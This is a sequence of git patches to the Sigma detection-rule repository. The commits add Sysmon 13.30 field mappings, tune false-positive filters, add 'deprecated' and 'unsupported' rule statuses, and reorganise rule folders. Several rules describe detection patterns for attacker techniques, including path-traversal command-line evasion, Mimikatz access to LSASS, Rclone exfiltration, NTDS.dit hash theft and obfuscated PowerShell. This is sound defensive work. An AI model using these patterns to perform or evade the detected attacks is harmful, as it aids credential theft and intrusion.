ParentUser: - 'NT AUTHORITY\NETWORK SERVICE' - 'NT AUTHORITY\LOCAL SERVICE' + User: + - 'NT AUTHORITY\SYSTEM' - 'AUTORITE NT\Sys' # French language settings - User: 'NT AUTHORITY\SYSTEM' IntegrityLevel: 'System' rundllexception: Image|endswith: '\rundll32.exe' From eb4ef6bcfc81c14101f4a78436ae907bfe8d834b Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 27 Oct 2021 11:16:12 +0200 Subject: [PATCH 1350/1367] fix: single list item to value --- .../process_creation/win_commandline_path_obfuscation.yml | 3 +-- 1 file changed, 1 insertion(+), 2 deletions(-) diff --git a/rules/windows/process_creation/win_commandline_path_obfuscation.yml b/rules/windows/process_creation/win_commandline_path_obfuscation.yml index 70fa5a9d..8fcf0948 100644 --- a/rules/windows/process_creation/win_commandline_path_obfuscation.yml +++ b/rules/windows/process_creation/win_commandline_path_obfuscation.yml @@ -15,8 +15,7 @@ logsource: product: windows detection: selection1: - Image|contains: - - '\Windows\' + Image|contains: '\Windows\' CommandLine|contains: - '\..\Windows\' - '\..\System32\' From ce5e4c45f13f0065cb9724497518d94549695149 Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 27 Oct 2021 12:58:10 +0200 Subject: [PATCH 1351/1367] Add sysmon 13.30 ParentUser --- tools/config/winlogbeat-modules-enabled.yml | 1 + 1 file changed, 1 insertion(+) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index a917b4c6..8bf9155f 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -185,6 +185,7 @@ fieldmappings: ParentProcessId: process.parent.pid ParentImage: process.parent.executable ParentCommandLine: process.parent.command_line + ParentUser: winlog.event_data.ParentUser #Sysmon 13.30 TargetFilename: file.path CreationUtcTime: winlog.event_data.CreationUtcTime PreviousCreationUtcTime: winlog.event_data.PreviousCreationUtcTime From 8b1279448682019f84b4ad0373c289c16af893c7 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Wed, 27 Oct 2021 14:07:27 +0200 Subject: [PATCH 1352/1367] fix: change title and filename --- ...scation.yml => win_commandline_path_traversal_evasion.yml} | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) rename rules/windows/process_creation/{win_commandline_path_obfuscation.yml => win_commandline_path_traversal_evasion.yml} (79%) diff --git a/rules/windows/process_creation/win_commandline_path_obfuscation.yml b/rules/windows/process_creation/win_commandline_path_traversal_evasion.yml similarity index 79% rename from rules/windows/process_creation/win_commandline_path_obfuscation.yml rename to rules/windows/process_creation/win_commandline_path_traversal_evasion.yml index 8fcf0948..0ddf5aa8 100644 --- a/rules/windows/process_creation/win_commandline_path_obfuscation.yml +++ b/rules/windows/process_creation/win_commandline_path_traversal_evasion.yml @@ -1,9 +1,9 @@ -title: Command Line Path Obfuscation +title: Command Line Path Traversial Evasion status: experimental id: 1327381e-6ab0-4f38-b583-4c1b8346a56b author: Christian Burkard date: 2021/10/26 -description: Detects the attempt to hide or obfuscate the executed command on the CommandLine using bogus path traversal +description: Detects the attempt to evade or obfuscate the executed command on the CommandLine using bogus path traversal references: - https://twitter.com/hexacorn/status/1448037865435320323 - https://twitter.com/Gal_B1t/status/1062971006078345217 From c228cde0cbef0397e451bc5fe5294c0cf34bb21d Mon Sep 17 00:00:00 2001 From: frack113 Date: Wed, 27 Oct 2021 14:38:51 +0200 Subject: [PATCH 1353/1367] Move to correct directory --- rules/linux/{ => process_creation}/lnx_base64_decode.yml | 0 rules/linux/{ => process_creation}/lnx_clear_logs.yml | 0 .../{ => process_creation}/lnx_file_and_directory_discovery.yml | 0 rules/linux/{ => process_creation}/lnx_file_deletion.yml | 0 .../linux/{ => process_creation}/lnx_install_root_certificate.yml | 0 rules/linux/{ => process_creation}/lnx_local_account.yml | 0 rules/linux/{ => process_creation}/lnx_local_groups.yml | 0 .../linux/{ => process_creation}/lnx_network_service_scanning.yml | 0 rules/linux/{ => process_creation}/lnx_process_discovery.yml | 0 .../linux/{ => process_creation}/lnx_remote_system_discovery.yml | 0 rules/linux/{ => process_creation}/lnx_schedule_task_job_cron.yml | 0 .../{ => process_creation}/lnx_security_software_discovery.yml | 0 .../linux/{ => process_creation}/lnx_security_tools_disabling.yml | 0 rules/linux/{ => process_creation}/lnx_system_info_discovery.yml | 0 .../lnx_system_network_connections_discovery.yml | 0 .../process_creation_stordiag_execution.yml | 0 16 files changed, 0 insertions(+), 0 deletions(-) rename rules/linux/{ => process_creation}/lnx_base64_decode.yml (100%) rename rules/linux/{ => process_creation}/lnx_clear_logs.yml (100%) rename rules/linux/{ => process_creation}/lnx_file_and_directory_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_file_deletion.yml (100%) rename rules/linux/{ => process_creation}/lnx_install_root_certificate.yml (100%) rename rules/linux/{ => process_creation}/lnx_local_account.yml (100%) rename rules/linux/{ => process_creation}/lnx_local_groups.yml (100%) rename rules/linux/{ => process_creation}/lnx_network_service_scanning.yml (100%) rename rules/linux/{ => process_creation}/lnx_process_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_remote_system_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_schedule_task_job_cron.yml (100%) rename rules/linux/{ => process_creation}/lnx_security_software_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_security_tools_disabling.yml (100%) rename rules/linux/{ => process_creation}/lnx_system_info_discovery.yml (100%) rename rules/linux/{ => process_creation}/lnx_system_network_connections_discovery.yml (100%) rename rules/windows/{ => process_creation}/process_creation_stordiag_execution.yml (100%) diff --git a/rules/linux/lnx_base64_decode.yml b/rules/linux/process_creation/lnx_base64_decode.yml similarity index 100% rename from rules/linux/lnx_base64_decode.yml rename to rules/linux/process_creation/lnx_base64_decode.yml diff --git a/rules/linux/lnx_clear_logs.yml b/rules/linux/process_creation/lnx_clear_logs.yml similarity index 100% rename from rules/linux/lnx_clear_logs.yml rename to rules/linux/process_creation/lnx_clear_logs.yml diff --git a/rules/linux/lnx_file_and_directory_discovery.yml b/rules/linux/process_creation/lnx_file_and_directory_discovery.yml similarity index 100% rename from rules/linux/lnx_file_and_directory_discovery.yml rename to rules/linux/process_creation/lnx_file_and_directory_discovery.yml diff --git a/rules/linux/lnx_file_deletion.yml b/rules/linux/process_creation/lnx_file_deletion.yml similarity index 100% rename from rules/linux/lnx_file_deletion.yml rename to rules/linux/process_creation/lnx_file_deletion.yml diff --git a/rules/linux/lnx_install_root_certificate.yml b/rules/linux/process_creation/lnx_install_root_certificate.yml similarity index 100% rename from rules/linux/lnx_install_root_certificate.yml rename to rules/linux/process_creation/lnx_install_root_certificate.yml diff --git a/rules/linux/lnx_local_account.yml b/rules/linux/process_creation/lnx_local_account.yml similarity index 100% rename from rules/linux/lnx_local_account.yml rename to rules/linux/process_creation/lnx_local_account.yml diff --git a/rules/linux/lnx_local_groups.yml b/rules/linux/process_creation/lnx_local_groups.yml similarity index 100% rename from rules/linux/lnx_local_groups.yml rename to rules/linux/process_creation/lnx_local_groups.yml diff --git a/rules/linux/lnx_network_service_scanning.yml b/rules/linux/process_creation/lnx_network_service_scanning.yml similarity index 100% rename from rules/linux/lnx_network_service_scanning.yml rename to rules/linux/process_creation/lnx_network_service_scanning.yml diff --git a/rules/linux/lnx_process_discovery.yml b/rules/linux/process_creation/lnx_process_discovery.yml similarity index 100% rename from rules/linux/lnx_process_discovery.yml rename to rules/linux/process_creation/lnx_process_discovery.yml diff --git a/rules/linux/lnx_remote_system_discovery.yml b/rules/linux/process_creation/lnx_remote_system_discovery.yml similarity index 100% rename from rules/linux/lnx_remote_system_discovery.yml rename to rules/linux/process_creation/lnx_remote_system_discovery.yml diff --git a/rules/linux/lnx_schedule_task_job_cron.yml b/rules/linux/process_creation/lnx_schedule_task_job_cron.yml similarity index 100% rename from rules/linux/lnx_schedule_task_job_cron.yml rename to rules/linux/process_creation/lnx_schedule_task_job_cron.yml diff --git a/rules/linux/lnx_security_software_discovery.yml b/rules/linux/process_creation/lnx_security_software_discovery.yml similarity index 100% rename from rules/linux/lnx_security_software_discovery.yml rename to rules/linux/process_creation/lnx_security_software_discovery.yml diff --git a/rules/linux/lnx_security_tools_disabling.yml b/rules/linux/process_creation/lnx_security_tools_disabling.yml similarity index 100% rename from rules/linux/lnx_security_tools_disabling.yml rename to rules/linux/process_creation/lnx_security_tools_disabling.yml diff --git a/rules/linux/lnx_system_info_discovery.yml b/rules/linux/process_creation/lnx_system_info_discovery.yml similarity index 100% rename from rules/linux/lnx_system_info_discovery.yml rename to rules/linux/process_creation/lnx_system_info_discovery.yml diff --git a/rules/linux/lnx_system_network_connections_discovery.yml b/rules/linux/process_creation/lnx_system_network_connections_discovery.yml similarity index 100% rename from rules/linux/lnx_system_network_connections_discovery.yml rename to rules/linux/process_creation/lnx_system_network_connections_discovery.yml diff --git a/rules/windows/process_creation_stordiag_execution.yml b/rules/windows/process_creation/process_creation_stordiag_execution.yml similarity index 100% rename from rules/windows/process_creation_stordiag_execution.yml rename to rules/windows/process_creation/process_creation_stordiag_execution.yml From 781598351d39f09d08bf24a1948202481cf0969f Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Wed, 27 Oct 2021 17:13:34 +0200 Subject: [PATCH 1354/1367] Add SourceUser and TargetUser --- tools/config/winlogbeat-modules-enabled.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index 8bf9155f..dfc0ca9e 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -186,6 +186,8 @@ fieldmappings: ParentImage: process.parent.executable ParentCommandLine: process.parent.command_line ParentUser: winlog.event_data.ParentUser #Sysmon 13.30 + SourceUser: winlog.event_data.SourceUser #Sysmon 13.30 + TargetUser: winlog.event_data.TargetUser #Sysmon 13.30 TargetFilename: file.path CreationUtcTime: winlog.event_data.CreationUtcTime PreviousCreationUtcTime: winlog.event_data.PreviousCreationUtcTime From 7543b3e2a62bf383b37fe64813d39a709d0c7099 Mon Sep 17 00:00:00 2001 From: Roberto Rodriguez Date: Wed, 27 Oct 2021 11:56:19 -0400 Subject: [PATCH 1355/1367] added definition to Sysmon 13.30 rule for priv escalation --- .../process_creation/win_susp_child_process_as_system_.yml | 2 ++ 1 file changed, 2 insertions(+) diff --git a/rules/windows/process_creation/win_susp_child_process_as_system_.yml b/rules/windows/process_creation/win_susp_child_process_as_system_.yml index 241bcc8e..0039d597 100644 --- a/rules/windows/process_creation/win_susp_child_process_as_system_.yml +++ b/rules/windows/process_creation/win_susp_child_process_as_system_.yml @@ -17,11 +17,13 @@ modified: 2020/10/26 logsource: category: process_creation product: windows + definition: ParentUser field needs sysmon >= 13.30 detection: selection: ParentUser: - 'NT AUTHORITY\NETWORK SERVICE' - 'NT AUTHORITY\LOCAL SERVICE' + - 'AUTORITE NT\' # French language settings User: - 'NT AUTHORITY\SYSTEM' - 'AUTORITE NT\Sys' # French language settings From 6fb27eeb768491dcfe119425724aa481232fddc2 Mon Sep 17 00:00:00 2001 From: phantinuss Date: Thu, 28 Oct 2021 10:33:36 +0200 Subject: [PATCH 1356/1367] fix: fix FPs found in production environment --- .../file_event/sysmon_creation_system_file.yml | 14 ++++++++------ .../windows/malware/registry_event_mal_ursnif.yml | 8 +++++++- 2 files changed, 15 insertions(+), 7 deletions(-) diff --git a/rules/windows/file_event/sysmon_creation_system_file.yml b/rules/windows/file_event/sysmon_creation_system_file.yml index 7406f4e7..00933d3c 100755 --- a/rules/windows/file_event/sysmon_creation_system_file.yml +++ b/rules/windows/file_event/sysmon_creation_system_file.yml @@ -1,10 +1,10 @@ title: File Created with System Process Name id: d5866ddf-ce8f-4aea-b28e-d96485a20d3d status: experimental -description: Detects the creation of a executable with a system process name in a suspicious folder +description: Detects the creation of an executable with a system process name in a suspicious folder author: Sander Wiebing date: 2020/05/26 -modified: 2021/05/16 +modified: 2021/10/28 tags: - attack.defense_evasion - attack.t1036 # an old one @@ -39,7 +39,7 @@ detection: - '\dllhost.exe' - '\audiodg.exe' - '\wlanext.exe' - filter: + filter1: TargetFilename|startswith: - 'C:\Windows\System32\' - 'C:\Windows\system32\' @@ -48,9 +48,11 @@ detection: - 'C:\Windows\winsxs\' - 'C:\Windows\WinSxS\' - '\SystemRoot\System32\' - Image|endswith: - - '\Windows\System32\dism.exe' - condition: selection and not filter + Image|endswith: '\Windows\System32\dism.exe' + filter2: + TargetFilename|startswith: 'C:\$WINDOWS.~BT\' + Image: 'C:\$WINDOWS.~BT\Sources\SetupHost.exe' + condition: selection and not filter1 and not filter2 fields: - Image falsepositives: diff --git a/rules/windows/malware/registry_event_mal_ursnif.yml b/rules/windows/malware/registry_event_mal_ursnif.yml index ca934073..31277012 100644 --- a/rules/windows/malware/registry_event_mal_ursnif.yml +++ b/rules/windows/malware/registry_event_mal_ursnif.yml @@ -10,13 +10,19 @@ tags: - attack.t1112 author: megan201296 date: 2019/02/13 +modified: 2021/10/28 logsource: product: windows category: registry_event detection: selection: TargetObject|contains: '\Software\AppDataLow\Software\Microsoft\' - condition: selection + filter: + TargetObject|contains: + - '\SOFTWARE\AppDataLow\Software\Microsoft\Internet Explorer\' + - '\SOFTWARE\AppDataLow\Software\Microsoft\RepService\' + - '\SOFTWARE\AppDataLow\Software\Microsoft\IME\' + condition: selection and not filter falsepositives: - Unknown level: critical From 1015d3fe68fa38e9f85025b6514b03522a020383 Mon Sep 17 00:00:00 2001 From: Nasreddine Bencherchali <8741929+nasbench@users.noreply.github.com> Date: Thu, 28 Oct 2021 16:05:40 +0100 Subject: [PATCH 1357/1367] Update winlogbeat-modules-enabled.yml - Fixed typos in FileVersion, Description, Product, and Company fields for image_load category. - Added separate OriginalFileName fields for process_creation, image_load categories. --- tools/config/winlogbeat-modules-enabled.yml | 13 ++++++++----- 1 file changed, 8 insertions(+), 5 deletions(-) diff --git a/tools/config/winlogbeat-modules-enabled.yml b/tools/config/winlogbeat-modules-enabled.yml index dfc0ca9e..d7ec0f09 100644 --- a/tools/config/winlogbeat-modules-enabled.yml +++ b/tools/config/winlogbeat-modules-enabled.yml @@ -155,22 +155,25 @@ fieldmappings: Image: process.executable FileVersion: category=process_creation: process.pe.file_version - category=image_load: process.pe.file_version + category=image_load: file.pe.file_version default: winlog.event_data.FileVersion Description: category=process_creation: process.pe.description - category=image_load: process.pe.description + category=image_load: file.pe.description category=sysmon_error: winlog.event_data.Description default: winlog.event_data.Description Product: category=process_creation: process.pe.product - category=image_load: process.pe.product + category=image_load: file.pe.product default: winlog.event_data.Product Company: category=process_creation: process.pe.company - category=image_load: process.pe.company + category=image_load: file.pe.company default: winlog.event_data.Company - OriginalFileName: process.pe.original_file_name + OriginalFileName: + category=process_creation: process.pe.original_file_name + category=image_load: file.pe.original_file_name + default: winlog.event_data.OriginalFileName CommandLine: category=process_creation: process.command_line service=security: process.command_line From e9d163cdd1bbdf30ea4fd1b0fd9782f177b167ce Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 28 Oct 2021 19:46:36 +0200 Subject: [PATCH 1358/1367] add filter not status --- tools/sigma/filter.py | 14 ++++++++++++++ 1 file changed, 14 insertions(+) diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index b99be7c0..891b3e98 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -32,6 +32,7 @@ class SigmaRuleFilter: self.minlevel = None self.maxlevel = None self.status = None + self.notstatus = None self.tlp = None self.target = None self.logsources = list() @@ -66,6 +67,10 @@ class SigmaRuleFilter: self.status = cond[cond.index("=") + 1:] if self.status not in self.STATES: raise SigmaRuleFilterParseException("Unknown status '%s' in condition '%s'" % (self.status, cond)) + elif cond.startswith("status!="): + self.notstatus = cond[cond.index("=") + 1:] + if self.notstatus not in self.STATES: + raise SigmaRuleFilterParseException("Unknown status '%s' in condition '%s'" % (self.notstatus, cond)) elif cond.startswith("tlp="): self.tlp = cond[cond.index("=") + 1:].upper() #tlp is always uppercase elif cond.startswith("target="): @@ -117,6 +122,15 @@ class SigmaRuleFilter: return False # User wants status restriction, but it's not possible here if status != self.status: return False + + if self.notstatus is not None: + try: + status = yamldoc['status'] + except KeyError: # missing status + return False # User wants status restriction, but it's not possible here + if status == self.notstatus: + return False + # Tlp if self.tlp is not None: From c49b0d49faf84246df3950d909d4e585bc3c80a8 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Thu, 28 Oct 2021 20:08:27 +0200 Subject: [PATCH 1359/1367] Add deprecated status --- .../windows/deprecated/powershell_suspicious_download.yml | 2 +- .../powershell_suspicious_invocation_generic.yml | 2 +- .../powershell_suspicious_invocation_specific.yml | 2 +- .../deprecated/powershell_syncappvpublishingserver_exe.yml | 3 ++- .../process_creation_syncappvpublishingserver_exe.yml | 3 ++- .../windows/deprecated/sysmon_mimikatz_detection_lsass.yml | 2 +- rules/windows/deprecated/sysmon_rclone_execution.yml | 2 +- rules/windows/deprecated/win_susp_esentutl_activity.yml | 2 +- rules/windows/deprecated/win_susp_rclone_exec.yml | 2 +- .../windows/deprecated/win_susp_vssadmin_ntds_activity.yml | 2 +- tests/test_rules.py | 7 ++++++- tools/sigma/filter.py | 5 ++++- 12 files changed, 22 insertions(+), 12 deletions(-) diff --git a/rules/windows/deprecated/powershell_suspicious_download.yml b/rules/windows/deprecated/powershell_suspicious_download.yml index 703141c7..72d831a0 100644 --- a/rules/windows/deprecated/powershell_suspicious_download.yml +++ b/rules/windows/deprecated/powershell_suspicious_download.yml @@ -1,6 +1,6 @@ title: Suspicious PowerShell Download id: 65531a81-a694-4e31-ae04-f8ba5bc33759 -status: experimental +status: deprecated description: Detects suspicious PowerShell download command tags: - attack.execution diff --git a/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml b/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml index db4e9201..d40dacc5 100644 --- a/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml +++ b/rules/windows/deprecated/powershell_suspicious_invocation_generic.yml @@ -1,6 +1,6 @@ title: Suspicious PowerShell Invocations - Generic id: 3d304fda-78aa-43ed-975c-d740798a49c1 -status: experimental +status: deprecated description: Detects suspicious PowerShell invocation command parameters tags: - attack.execution diff --git a/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml index 7ae574e1..080a241c 100644 --- a/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml +++ b/rules/windows/deprecated/powershell_suspicious_invocation_specific.yml @@ -1,6 +1,6 @@ title: Suspicious PowerShell Invocations - Specific id: fce5f582-cc00-41e1-941a-c6fabf0fdb8c -status: experimental +status: deprecated description: Detects suspicious PowerShell invocation command parameters tags: - attack.execution diff --git a/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml b/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml index 1b817587..34ae182a 100644 --- a/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml +++ b/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml @@ -21,4 +21,5 @@ detection: condition: selection falsepositives: - App-V clients -level: medium \ No newline at end of file +level: medium +status: deprecated \ No newline at end of file diff --git a/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml b/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml index 8a8fb511..1aeae54d 100644 --- a/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml +++ b/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml @@ -18,4 +18,5 @@ detection: condition: selection falsepositives: - App-V clients -level: medium \ No newline at end of file +level: medium +status: deprecated \ No newline at end of file diff --git a/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml b/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml index d94967e9..92242bd3 100644 --- a/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml +++ b/rules/windows/deprecated/sysmon_mimikatz_detection_lsass.yml @@ -1,6 +1,6 @@ title: Mimikatz Detection LSASS Access id: 0d894093-71bc-43c3-8c4d-ecfc28dcf5d9 -status: experimental +status: deprecated description: Detects process access to LSASS which is typical for Mimikatz (0x1000 PROCESS_QUERY_ LIMITED_INFORMATION, 0x0400 PROCESS_QUERY_ INFORMATION "only old versions", 0x0010 PROCESS_VM_READ) references: diff --git a/rules/windows/deprecated/sysmon_rclone_execution.yml b/rules/windows/deprecated/sysmon_rclone_execution.yml index 3a0b7dfe..b895b3a0 100644 --- a/rules/windows/deprecated/sysmon_rclone_execution.yml +++ b/rules/windows/deprecated/sysmon_rclone_execution.yml @@ -1,6 +1,6 @@ title: RClone Execution id: a0d63692-a531-4912-ad39-4393325b2a9c -status: experimental +status: deprecated description: Detects execution of RClone utility for exfiltration as used by various ransomwares strains like REvil, Conti, FiveHands, etc tags: - attack.exfiltration diff --git a/rules/windows/deprecated/win_susp_esentutl_activity.yml b/rules/windows/deprecated/win_susp_esentutl_activity.yml index 1e3e62db..8945c759 100644 --- a/rules/windows/deprecated/win_susp_esentutl_activity.yml +++ b/rules/windows/deprecated/win_susp_esentutl_activity.yml @@ -1,6 +1,6 @@ title: Suspicious Esentutl Use id: 56a8189f-11b2-48c8-8ca7-c54b03c2fbf7 -status: experimental +status: deprecated description: Detects flags often used with the LOLBAS Esentutl for malicious activity. It could be used in rare cases by administrators to access locked files or during maintenance. author: Florian Roth date: 2020/05/23 diff --git a/rules/windows/deprecated/win_susp_rclone_exec.yml b/rules/windows/deprecated/win_susp_rclone_exec.yml index 38f5b1c2..6f78ba37 100644 --- a/rules/windows/deprecated/win_susp_rclone_exec.yml +++ b/rules/windows/deprecated/win_susp_rclone_exec.yml @@ -1,7 +1,7 @@ title: Rclone Execution via Command Line or PowerShell id: cb7286ba-f207-44ab-b9e6-760d82b84253 description: Detects Rclone which is commonly used by ransomware groups for exfiltration -status: experimental +status: deprecated date: 2021/05/26 author: Aaron Greetham (@beardofbinary) - NCC Group references: diff --git a/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml b/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml index 06aca169..20f9be87 100644 --- a/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml +++ b/rules/windows/deprecated/win_susp_vssadmin_ntds_activity.yml @@ -1,6 +1,6 @@ title: Activity Related to NTDS.dit Domain Hash Retrieval id: b932b60f-fdda-4d53-8eda-a170c1d97bbd -status: experimental +status: deprecated description: Detects suspicious commands that could be related to activity that uses volume shadow copy to steal and retrieve hashes from the NTDS.dit file remotely author: Florian Roth, Michael Haag date: 2019/01/16 diff --git a/tests/test_rules.py b/tests/test_rules.py index 58c57fe0..bae8bd86 100755 --- a/tests/test_rules.py +++ b/tests/test_rules.py @@ -386,6 +386,8 @@ class TestRules(unittest.TestCase): "stable", "test", "experimental", + "deprecated", + "unsupported" ] for file in self.yield_next_rule_file_path(self.path_to_rules): status_str = self.get_rule_part(file_path=file, part_name="status") @@ -393,7 +395,10 @@ class TestRules(unittest.TestCase): if not status_str in valid_status: print(Fore.YELLOW + "Rule {} has a invalid 'status' (check wiki).".format(file)) faulty_rules.append(file) - + elif status_str == "unsupported": + print(Fore.YELLOW + "Rule {} has the unsupported 'status', can not be in rules directory".format(file)) + faulty_rules.append(file) + self.assertEqual(faulty_rules, [], Fore.RED + "There are rules with malformed 'status' fields. (check https://github.com/SigmaHQ/sigma/wiki/Specification)") diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index 891b3e98..d02dcabb 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -24,7 +24,10 @@ class SigmaRuleFilter: "high" : 2, "critical" : 3 } - STATES = ["experimental", + STATES = [ + "unsupported", + "deprecated", + "experimental", "test", "stable"] From f4b1dcfc72007a95b0f1a3f401dfa7349c3098ab Mon Sep 17 00:00:00 2001 From: frack113 Date: Thu, 28 Oct 2021 20:56:19 +0200 Subject: [PATCH 1360/1367] cleanup code --- tools/sigma/filter.py | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/tools/sigma/filter.py b/tools/sigma/filter.py index d02dcabb..2a85a924 100644 --- a/tools/sigma/filter.py +++ b/tools/sigma/filter.py @@ -35,7 +35,7 @@ class SigmaRuleFilter: self.minlevel = None self.maxlevel = None self.status = None - self.notstatus = None + self.notstatus = None self.tlp = None self.target = None self.logsources = list() @@ -125,7 +125,7 @@ class SigmaRuleFilter: return False # User wants status restriction, but it's not possible here if status != self.status: return False - + if self.notstatus is not None: try: status = yamldoc['status'] From b2d66c41f321a7115450c02b07cc22a5fa0856e7 Mon Sep 17 00:00:00 2001 From: frack113 <62423083+frack113@users.noreply.github.com> Date: Fri, 29 Oct 2021 06:53:24 +0200 Subject: [PATCH 1361/1367] change to unsupported status --- .../driver_load_invoke_obfuscation_clip+_services.yml | 2 +- .../driver_load_invoke_obfuscation_obfuscated_iex_services.yml | 2 +- .../driver_load_invoke_obfuscation_stdin+_services.yml | 2 +- .../driver_load_invoke_obfuscation_var+_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_compress_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_rundll_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_stdin_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_use_clip_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_use_mshta_services.yml | 2 +- ...river_load_invoke_obfuscation_via_use_rundll32_services.yml | 2 +- .../driver_load_invoke_obfuscation_via_var++_services.yml | 2 +- rules-unsupported/driver_load_tap_driver_installation.yml | 2 +- rules-unsupported/net_dns_high_subdomain_rate.yml | 2 +- rules-unsupported/net_dns_large_domain_name.yml | 2 +- rules-unsupported/net_possible_dns_rebinding.yml | 2 +- ...evated_msi_spawned_cmd_and_powershell_spawned_processes.yml | 2 +- .../sysmon_always_install_elevated_parent_child_correlated.yml | 2 +- rules-unsupported/sysmon_process_reimaging.yml | 2 +- .../win_access_fake_files_with_stored_credentials.yml | 2 +- rules-unsupported/win_apt_apt29_tor.yml | 3 ++- rules-unsupported/win_dumping_ntdsdit_via_dcsync.yml | 2 +- rules-unsupported/win_dumping_ntdsdit_via_netsync.yml | 2 +- ...in_kernel_and_3rd_party_drivers_exploits_token_stealing.yml | 2 +- rules-unsupported/win_mal_service_installs.yml | 3 ++- .../win_metasploit_or_impacket_smb_psexec_service_install.yml | 3 ++- .../win_possible_privilege_escalation_using_rotten_potato.yml | 2 +- rules-unsupported/win_remote_schtask.yml | 2 +- rules-unsupported/win_remote_service.yml | 2 +- 28 files changed, 31 insertions(+), 28 deletions(-) diff --git a/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml index 8d2dea05..aafd2587 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_clip+_services.yml @@ -4,7 +4,7 @@ related: - id: f7385ee2-0e0c-11eb-adc1-0242ac120002 type: derived description: Detects Obfuscated use of Clip.exe to execute PowerShell -status: experimental +status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/13 modified: 2021/09/16 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml index 98fcddc6..797b7d89 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_obfuscated_iex_services.yml @@ -4,7 +4,7 @@ related: - id: 51aa9387-1c53-4153-91cc-d73c59ae1ca9 type: derived description: "Detects all variations of obfuscated powershell IEX invocation code generated by Invoke-Obfuscation framework from the following code block \u2014 https://github.com/danielbohannon/Invoke-Obfuscation/blob/master/Out-ObfuscatedStringCommand.ps1#L873-L888" -status: experimental +status: unsupported author: Daniel Bohannon (@Mandiant/@FireEye), oscd.community date: 2019/11/08 modified: 2021/09/16 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml index 1d7b40b0..e4e33145 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_stdin+_services.yml @@ -4,7 +4,7 @@ related: - id: 72862bf2-0eb1-11eb-adc1-0242ac120002 type: derived description: Detects Obfuscated use of stdin to execute PowerShell -status: experimental +status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2021/09/17 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml index 2619bc83..1c2bdb56 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_var+_services.yml @@ -4,7 +4,7 @@ related: - id: 8ca7004b-e620-4ecb-870e-86129b5b8e75 type: derived description: Detects Obfuscated use of Environment Variables to execute PowerShell -status: experimental +status: unsupported author: Jonathan Cheong, oscd.community date: 2020/10/15 modified: 2021/09/17 diff --git a/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml b/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml index 5b5b569c..8860d993 100644 --- a/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml +++ b/rules-unsupported/driver_load_invoke_obfuscation_via_compress_services.yml @@ -4,7 +4,7 @@ related: - id: 175997c5-803c-4b08-8bb0-70b099f47595 type: derived description: Detects Obfuscated 